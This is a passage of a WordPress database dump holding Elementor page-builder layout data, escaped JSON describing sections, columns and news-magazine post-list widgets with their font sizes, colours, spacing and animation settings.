\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1185,434,'_elementor_version','0.4'),(1187,435,'_elementor_edit_mode','builder'),(1188,435,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight